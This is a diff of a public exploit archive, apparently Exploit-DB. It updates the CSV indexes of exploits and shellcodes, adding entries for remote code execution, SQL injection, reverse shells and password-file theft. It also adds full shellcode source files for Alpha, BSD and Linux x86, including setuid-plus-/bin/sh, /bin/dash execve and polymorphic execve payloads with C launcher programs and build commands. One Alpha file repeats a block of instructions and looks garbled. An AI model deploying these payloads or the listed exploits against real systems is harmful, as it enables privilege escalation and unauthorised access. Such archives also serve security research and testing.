@ -9259,6 +9261,7 @@ id,file,description,date,author,type,platform,port
 43427,exploits/multiple/local/43427.c,"Multiple CPUs - 'Spectre' Information Disclosure",2018-01-03,Multiple,local,multiple,
 43449,exploits/linux/local/43449.rb,"VMware Workstation - ALSA Config File Local Privilege Escalation (Metasploit)",2018-01-05,Metasploit,local,linux,
 43465,exploits/windows/local/43465.txt,"Microsoft Windows - Local XPS Print Spooler Sandbox Escape",2018-01-08,"Google Security Research",local,windows,
 43494,exploits/windows/local/43494.cpp,"Jungo Windriver 12.5.1 - Privilege Escalation",2018-01-10,"Fidus InfoSecurity",local,windows,
 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -15909,6 +15912,9 @@ id,file,description,date,author,type,platform,port
 43450,exploits/hardware/remote/43450.py,"Cisco IOS - Remote Code Execution",2018-01-05,"Artem Kondratenko",remote,hardware,
 43458,exploits/multiple/remote/43458.py,"Oracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution",2018-01-03,"Kevin Kirsche",remote,multiple,
 43472,exploits/windows/remote/43472.rb,"Commvault Communications Service (cvd) - Command Injection (Metasploit)",2018-01-09,Metasploit,remote,windows,8400
 43478,exploits/windows/remote/43478.py,"DiskBoss Enterprise 8.8.16 - Buffer Overflow",2018-01-10,"Arris Huijgen",remote,windows,
 43492,exploits/windows/remote/43492.rb,"HPE iMC - dbman RestoreDBase Unauthenticated Remote Command Execution (Metasploit)",2018-01-10,Metasploit,remote,windows,2810
 43493,exploits/windows/remote/43493.rb,"HPE iMC - dbman RestartDB Unauthenticated Remote Command Execution (Metasploit)",2018-01-10,Metasploit,remote,windows,2810
 41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
@ -25785,6 +25791,7 @@ id,file,description,date,author,type,platform,port
 19187,exploits/php/webapps/19187.txt,"WordPress Plugin Automatic 2.0.3 - SQL Injection",2012-06-16,nick58,webapps,php,
 19188,exploits/php/webapps/19188.txt,"Nuked Klan SP CMS 4.5 - SQL Injection",2012-06-16,Vulnerability-Lab,webapps,php,
 19189,exploits/php/webapps/19189.txt,"iScripts EasyCreate 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,webapps,php,
 43474,exploits/php/webapps/43474.rb,"Synology Photostation 6.7.2-3429 - Remote Code Execution (Metasploit)",2018-01-10,"James Bercegay",webapps,php,
 43150,exploits/hardware/webapps/43150.html,"Vonage VDV23 - Cross-Site Scripting",2017-11-16,Nu11By73,webapps,hardware,
 19263,exploits/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities",2012-06-18,"Sense of Security",webapps,hardware,
 19264,exploits/php/webapps/19264.txt,"MyTickets 1.x < 2.0.8 - Blind SQL Injection",2012-06-18,al-swisre,webapps,php,
@ -37734,6 +37741,14 @@ id,file,description,date,author,type,platform,port
 43460,exploits/hardware/webapps/43460.py,"FiberHome LM53Q1 - Multiple Vulnerabilities",2018-01-08,"Ibad Shah",webapps,hardware,
 43461,exploits/php/webapps/43461.txt,"WordPress Plugin LearnDash 2.5.3 - Arbitrary File Upload",2018-01-08,NinTechNet,webapps,php,
 43462,exploits/php/webapps/43462.html,"Vanilla < 2.1.5 - Cross-Site Request Forgery",2018-01-08,"Anand Meyyappan",webapps,php,
 43475,exploits/php/webapps/43475.txt,"Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure",2018-01-10,telahdihapus,webapps,php,
 43477,exploits/php/webapps/43477.txt,"Muviko 1.1 - SQL Injection",2018-01-10,"Ahmad Mahfouz",webapps,php,
 43479,exploits/php/webapps/43479.txt,"WordPress Plugin Events Calendar - 'event_id' SQL Injection",2018-01-10,"Dennis Veninga",webapps,php,
 43484,exploits/php/webapps/43484.txt,"WordPress Plugin Social Media Widget by Acurax 3.2.5 - Cross-Site Request Forgery",2018-01-10,"Panagiotis Vagenas",webapps,php,80
 43485,exploits/php/webapps/43485.txt,"WordPress Plugin CMS Tree Page View 1.4 - Cross-Site Request Forgery / Privilege Escalation",2018-01-10,"Panagiotis Vagenas",webapps,php,80
 43486,exploits/php/webapps/43486.txt,"WordPress Plugin Admin Menu Tree Page View 2.6.9 - Cross-Site Request Forgery / Privilege Escalation",2018-01-10,"Panagiotis Vagenas",webapps,php,80
 43487,exploits/php/webapps/43487.txt,"WordPress Plugin WordPress Download Manager 2.9.60 - Cross-Site Request Forgery",2018-01-10,"Panagiotis Vagenas",webapps,php,80
 43488,exploits/php/webapps/43488.txt,"Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting",2018-01-10,"Mattia Furlani",webapps,php,
 41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
 41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
 41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@ -4,7 +4,7 @@ id,file,description,date,author,type,platform
 13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
 13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve /bin/sh Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
 13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
-13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + setuid(0) Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
+13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - setuid(0) + Bind TCP Shell (31337/TCP) Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
 13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve /bin/sh Shellcode (27 bytes)",2004-09-26,n0gada,shellcode,bsd_x86
 13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
 13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86
@ -13,8 +13,8 @@ id,file,description,date,author,type,platform
 13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
 13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
 13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
-13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve /bin/cat /etc/master.passwd | mail [email] Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
+13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
-13256,shellcodes/bsd_x86/13256.c,"BSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd_x86
+13256,shellcodes/freebsd_x86/13256.c,"FreeBSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,freebsd_x86
 13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
 13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
 13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
@ -416,7 +416,7 @@ id,file,description,date,author,type,platform
 15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator
 15879,shellcodes/win_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,shellcode,win_x86
 16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
-16026,shellcodes/bsd_x86/16026.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,bsd_x86
+16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
 16283,shellcodes/win_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,win_x86
 17432,shellcodes/sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,sh4
 17194,shellcodes/lin_x86/17194.txt,"Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,lin_x86
@ -622,6 +622,12 @@ id,file,description,date,author,type,platform
 41510,shellcodes/lin_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,lin_x86-64
 41581,shellcodes/win_x86/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,win_x86
 43433,shellcodes/lin_x86/43433.c,"Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,lin_x86
 43476,shellcodes/lin_x86/43476.c,"Linux/x86 - execve /bin/dash Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,lin_x86
 43480,shellcodes/alpha/43480.c,"Alpha - /bin/sh Shellcode (80 bytes)",2009-01-01,"Lamont Granquist",shellcode,alpha
 43481,shellcodes/alpha/43481.c,"Alpha - execve() Shellcode (112 bytes)",2009-01-01,anonymous,shellcode,alpha
 43482,shellcodes/alpha/43482.c,"Alpha - setuid() Shellcode (156 bytes)",2009-01-01,anonymous,shellcode,alpha
 43483,shellcodes/bsd_x86/43483.c,"BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)",2009-01-01,"Jihyeog Lim",shellcode,bsd_x86
 43489,shellcodes/lin_x86/43489.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,lin_x86
 41630,shellcodes/lin_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,shellcode,lin_x86
 41631,shellcodes/lin_x86/41631.c,"Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,lin_x86
 41635,shellcodes/lin_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 Bytes)",2017-03-19,WangYihang,shellcode,lin_x86
--- a/shellcodes/alpha/43480.c
+++ b/shellcodes/alpha/43480.c
@ -0,0 +1,29 @@
 /*
   Lamont Granquist
   lamontg@hitl.washington.edu
   lamontg@u.washington.edu
 */
 int rawcode[] = {
  0x2230fec4,              /* subq $16,0x13c,$17 [2000]*/
  0x47ff0412,              /* clr $18            [2000]*/
  0x42509532,              /* subq $18, 0x84     [2000]*/
  0x239fffff,              /* xor $18, 0xffffffff, $18 */
  0x4b84169c,
  0x465c0812,
  0xb2510134,              /* stl $18, 0x134($17)[2000]*/
  0x265cff98,              /* lda $18, 0xff978cd0[2000]*/
  0x22528cd1,
  0x465c0812,              /* xor $18, 0xffffffff, $18 */
  0xb2510140,              /* stl $18, 0x140($17)[2000]*/
  0xb6110148,              /* stq $16,0x148($17) [2000]*/
  0xb7f10150,              /* stq $31,0x150($17) [2000]*/
  0x22310148,              /* addq $17,0x148,$17 [2000]*/
  0x225f013a,              /* ldil $18,0x13a     [2000]*/
  0x425ff520,              /* subq $18,0xff,$0   [2000]*/
  0x47ff0412,              /* clr $18            [2000]*/
  0xffffffff,              /* call_pal 0x83      [2000]*/
  0xd21fffed,              /* bsr $16,$l1    ENTRY     */
  0x6e69622f,              /* .ascii "/bin"      [2000]*/
  /* .ascii "/sh\0" is generated */
 };
--- a/shellcodes/alpha/43481.c
+++ b/shellcodes/alpha/43481.c
@ -0,0 +1,55 @@
 char shellcode[]=
        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
        /* $16 = $30 - 200
        /* $16 must have the shellcode address. However, before */
        /* the bsr instruction, $16 can't have the address.     */
        /* This instruction just store the meaningless address. */
        /* The all instruction before bsr are meaningless.      */
        "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */
        /* $17 = 0 or 0x83                                      */
        /* $17 = 0x83                                           */
        "\x12\x94\x07\x42"      /* addq $16,60,$18              */
        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
        /* $17("\x83\x00\x00\x00") is stored in $16 + 60 - 4    */
        /* address.                                             */
        /* ( "\xff\xff\xff\xff" -> "\x83\x00\x00\x00" )         */
        "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */
        "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */
        /* $17 = "\x1f\x04\xff\x47"                             */
        /* "\x1f\x04\xff\x47" is nop instruction.               */
        "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */
        /* change "bsr $16,-28" instruction" into nop           */
        /* instruction to pass through the bsr instruction.     */
        /* ( "\xf9\xff\x1f\xd2" -> "\x1f\x04\xff\x47" )         */
        "\xf9\xff\x1f\xd2"      /* bsr $16,-28                  */
        /* Jump to "bis $31,0x83,$17" and store the current     */
        /* address in the $16.                                  */
        /* After jump, this insturction will be changed into    */
        /* nop instruction.                                     */
        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
        "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
        "\x12\x04\xff\x47"      /* clr $18                      */
        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
        "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
        "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
        "\x12\x04\xff\x47"      /* clr $18                      */
        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
        "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
        "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
        "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
        "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
        "\x13\x94\xe7\x43"      /* addq $31,60,$19              */
        "\x20\x35\x60\x42"      /* subq $19,1,$0                */
        "\xff\xff\xff\xff";     /* callsys ( disguised )        */
        /* This will be changed to "\x83\x00\x00\x00"           */
--- a/shellcodes/alpha/43482.c
+++ b/shellcodes/alpha/43482.c
@ -0,0 +1,40 @@
 char shellcode[]=
        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
        "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */
        "\x12\x14\x02\x42"      /* addq $16,16,$18              */
        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
        "\x12\x94\x09\x42"      /* addq $16,76,$18              */
        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
        "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */
        "\x12\x14\x02\x42"      /* addq $16,16,$18              */
        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
        "\x12\x94\x09\x42"      /* addq $16,76,$18              */
        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
        "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */
        "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */
        "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */
        "\xf7\xff\x1f\xd2"      /* bsr $16,-32                  */
        "\x10\x04\xff\x47"      /* clr $16                      */
        "\x11\x14\xe3\x43"      /* addq $31,24,$17              */
        "\x20\x35\x20\x42"      /* subq $17,1,$0                */
        "\xff\xff\xff\xff"      /* callsys ( disguised )        */
        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
        "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
        "\x12\x04\xff\x47"      /* clr $18                      */
        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
        "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
        "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
        "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
        "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
        "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
        "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
        "\x13\x94\xe7\x43"      /* addq $31,60,$19              */
        "\x20\x35\x60\x42"      /* subq $19,1,$0                */
        "\xff\xff\xff\xff";     /* callsys ( disguised )        */
--- a/shellcodes/bsd_x86/43483.c
+++ b/shellcodes/bsd_x86/43483.c
@ -0,0 +1,25 @@
 /*
 * bsd/x86 setreuid/exec shellcode
 *
 * setreuid(geteuid(), geteuid()) and execve("/bin/sh", "/bin/sh", 0) 
 * shellcode based on hkpco's setreuid/exec shellcode for linux
 * Tested on FreeBSD
 */
 #include <stdio.h>
 #include <string.h>
 char shellcode[] =
 "\x31\xc0\xb0\x19\x50\xcd\x80\x50"
 "\x50\x31\xc0\xb0\x7e\x50\xcd\x80" // setreuid(geteuid(), getuid());
 "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2"
 "\x52\x57\x54\xb0\x3b\xcd\x80\xe8"
 "\xee\xff\xff\xff/bin/sh"; // exec(/bin/sh)
 int main()
 {
 int (*f)() = (int (*)())shellcode;
 printf("%d\n",strlen(shellcode));
 f();
 return 0;
 }
--- a/shellcodes/freebsd_x86/13256.c
+++ b/shellcodes/freebsd_x86/13256.c
--- a/shellcodes/freebsd_x86/16026.c
+++ b/shellcodes/freebsd_x86/16026.c
--- a/shellcodes/lin_x86/43476.c
+++ b/shellcodes/lin_x86/43476.c
@ -0,0 +1,76 @@
 /*
 ################## Description ####################
 ; Title   : exec /bin/dash - Shellcode
 ; Author  : Hashim Jawad
 ; Website : ihack4falafel[.]com
 ; Twitter : @ihack4falafel
 ; SLAE ID : SLAE-1115
 ; Purpose : spawn /bin/dash shell
 ; OS      : Linux
 ; Arch    : x86
 ; Size    : 30 bytes
 ################### dash.nasm #####################
 global _start
 section .text
 _start:
        ; push NULL into the stack
        xor eax, eax
        push eax
        ; push (////bin/dash) into the stack
        push 0x68736164
        push 0x2f6e6962
        push 0x2f2f2f2f
        ; push ESP pointer to EBX
        mov ebx, esp
        ; execute  __NR_execve syscall
        push eax
        mov edx, esp
        push ebx
        mov ecx, esp
        mov al, 0xb
        int 0x80
 ################### dash binary #####################
 nasm -f elf32 -o dash.o dash.nasm
 ld -z execstack -o dash dash.o
 ################### Shellcode ########################
 objdump -d dash -M intel
 ##################  Compile  #########################
 gcc -fno-stack-protector -z execstack dash.c -o dash
 */
 #include<stdio.h>
 #include<string.h>
 unsigned char code[] = \
 "\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
 main()
 {
 	printf("Shellcode Length:  %d\n", strlen(code));
 	int (*ret)() = (int(*)())code;
 	ret();
 }
--- a/shellcodes/lin_x86/43489.c
+++ b/shellcodes/lin_x86/43489.c
@ -0,0 +1,66 @@
 /*
 # Title: Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)
 # Date: 10-Jan-2018
 # Exploit Author: Debashis Pal <debashis.pals[at]gmail.com>
 # SLAE-1122
 # Tested on: i686 GNU/Linux
 # '//bin/sh' = 0x68732f6e  0x69622f2f
 ########## polymorphic.nasm ########## 
 global _start
 section .text
 _start:
 add esi, 0x30 ;junk
 xor ecx, ecx
 mul ecx
 mov dword [esp-4], ecx
 sub esp, 4
 mov esi, 0x353ffc3b  
 add esi, 0x33333333 ; 0x68732f6e
 mov dword [esp-4], esi
 mov edi, 0xada67373
 sub edi, 0x44444444 ; 0x69622f2f
 mov dword [esp-8], edi
 sub esp, 8
 mov ebx, esp
 mov al, 11
 int 0x80
 #################################### 
 $ nasm -f elf polymorphic.nasm 
 $ ld -o polymorphic polymorphic.o 
 $ objdump -d ./polymorphic|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
 "\x83\xc6\x30\x31\xc9\xf7\xe1\x89\x4c\x24\xfc\x83\xec\x04\xbe\x3b\xfc\x3f\x35\x81\xc6\x33\x33\x33\x33\x89\x74\x24\xfc\xbf\x73\x73\xa6\xad\x81\xef\x44\x44\x44\x44\x89\x7c\x24\xf8\x83\xec\x08\x89\xe3\xb0\x0b\xcd\x80"
 $ gcc -fno-stack-protector -z execstack shellcode.c -o x86PolymorphicShellcodelinux32
 $ ./x86PolymorphicShellcodelinux32 
 Shellcode Length:  53
 $ uname -a
 Linux kali 4.4.0-kali1-686 #1 SMP Debian 4.4.2-3kali1 (2016-02-23) i686 GNU/Linux
 $ 
 #################################### 
 */
 #include<stdio.h>
 #include<string.h>
 unsigned char code[] = \
 "\x83\xc6\x30\x31\xc9\xf7\xe1\x89\x4c\x24\xfc\x83\xec\x04\xbe\x3b\xfc\x3f\x35"
 "\x81\xc6\x33\x33\x33\x33\x89\x74\x24\xfc\xbf\x73\x73\xa6\xad\x81\xef\x44\x44"
 "\x44\x44\x89\x7c\x24\xf8\x83\xec\x08\x89\xe3\xb0\x0b\xcd\x80";
 int main()
 {
 	printf("Shellcode Length:  %d\n", strlen(code));
 	int (*ret)() = (int(*)())code;
 	ret();
 }